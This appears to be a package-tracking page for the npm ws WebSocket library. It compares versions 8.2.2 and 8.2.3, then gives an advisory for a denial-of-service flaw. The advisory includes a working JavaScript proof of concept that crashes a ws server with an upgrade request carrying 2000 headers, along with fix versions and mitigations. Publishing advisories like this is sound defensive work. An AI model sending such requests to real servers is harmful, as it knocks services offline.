The npm package ws, a popular choice for implementing WebSocket clients and servers in Node.js, saw a new stable release with version 8.2.3 following version 8.2.2. Examining the package metadata reveals subtle but potentially impactful changes for developers utilizing this library. The core description remains consistent: a "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js," emphasizing stability and performance, key considerations for real-time communication applications. The developer dependencies, including testing frameworks like mocha and code quality tools like eslint and prettier, are identical across both versions, suggesting a continued commitment to code maintainability and consistent styling. Similarly, the peer dependencies, bufferutil and utf-8-validate, remain unchanged, indicating compatibility with the same native extensions for optimized buffer handling and UTF-8 validation.
While the code base likely underwent internal improvements and bug fixes, the most immediate difference lies in the dist section. Version 8.2.3 has an unpacked size of 126725 bytes compared to the 126490 bytes of version 8.2.2. This suggests a minor increase in the overall code footprint, potentially due to added features, slight modifications to existing functionality, or updated dependencies within the packaged code. The release dates also highlight the recency of 8.2.3, released on 2021-10-02, subsequent to 8.2.2's release on 2021-09-08. For developers, the upgrade from 8.2.2 to 8.2.3 should be relatively seamless, given the unchanged dependencies. However, reviewing the changelog associated with 8.2.3 is crucial to understanding the specific fixes, performance improvements or new features introduced, so that the upgrade decision is an informed one.
All vulnerabilities affecting version 8.2.3 of the package
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.
```javascript
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  // Generate 2000 distinct two-character header names from characters that
  // are valid in an HTTP token, so the request exceeds server.maxHeadersCount.
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';
      if (++count === 2000) break;
    }
  }

  // The WebSocket handshake headers come after the 2000 generated ones.
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  // Send the oversized upgrade request to the ws server started above.
  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
2. Set server.maxHeadersCount to 0 so that no limit is applied.

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.